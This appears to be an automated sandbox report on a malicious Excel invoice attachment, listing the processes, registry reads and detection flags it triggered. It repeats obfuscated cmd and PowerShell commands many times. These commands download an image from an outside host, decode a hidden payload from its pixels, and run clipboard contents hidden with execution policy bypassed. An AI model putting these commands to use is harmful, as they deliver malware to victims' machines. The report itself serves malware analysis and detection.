Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -ba
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: unknownProcess created: C:\Windows\System32\clip.exe CLip
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -baJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\clip.exe CLip
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000008.00000002.1587987947.01A30000.00000002.sdmp
Document has a 'lastprinted' value indicative of goodwareShow sources
Source: 634 #U8acb#U6c42#U66f8#Uff082018#U5e7410#U6708#Uff09.xlsInitial sample: OLE summary lastprinted = 2018-10-05 03:08:22

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -ba
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -ba
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /V:ON/C'set d0=rMc5( ''Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -baJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /CEchO ^^^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15)*16)-bor(${P}.'G' -baJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EchO ^&('{2}{1}{0}' -f 'EM','IT','SET-') ('{1}{2}{0}' -f'2dG','vA','riable:') ( [TyPE]('{0}{1}'-F 'MAT','H') ); .('{0}{1}{2}' -f 'sE','t-','itEM') ('{1}{0}{2}{4}{3}'-f 'a','vari','B','dGNV','lE:') ( [TyPE]('{4}{1}{0}{3}{2}' -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&('{0}{1}' -f 's','al') ('a') ('{0}{1}{2}'-f'New-Obje','c','t');.('{1}{0}' -f '-Type','Add') -AssemblyName ('{0}{2}{3}{1}{4}' -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ('{4}{1}{3}{2}{0}'-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ('{2}{0}{1}'-f 'lien','t','Net.WebC')).('{1}{0}' -f'enRead','Op').Invoke(('{0}{2}{3}{6}{5}{1}{4}' -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ('{0}{1}' -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.('{2}{1}{0}' -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.('{2}{0}{1}'-f'rIAB','le','VA') ('{1}{0}'-f'dG','2') -VaLUeoNlY )::('{1}{0}'-f'loor','F').Invoke((${p}.'B'-band15
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\'{2}{0}{1}\' -f '-T','ype','Add' ) -Assem ( \'{3}{4}{0}{1}{2}\'-f 'o','nCo','re','P',( \'{0}{1}{2}\'-f're','senta','ti' )) ; .( \'{3}{2}{1}{0}\'-f ( \'{0}{1}\' -f 'SI','On'),( \'{1}{0}\' -f'es','xPr' ),'e',( \'{0}{1}\' -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\'{1}{0}\' -f'Xt',(\'{1}{0}\'-f'Te','GeT') ).\'In`VoKE\'( ) ) ) ;[Windows.Clipboard]::( \'{1}{0}\' -f 'r',(\'{1}{0}\'-f'lea','C' ) ).\'i`NVoKe\'( )
PowerShell case anomaly foundShow sources
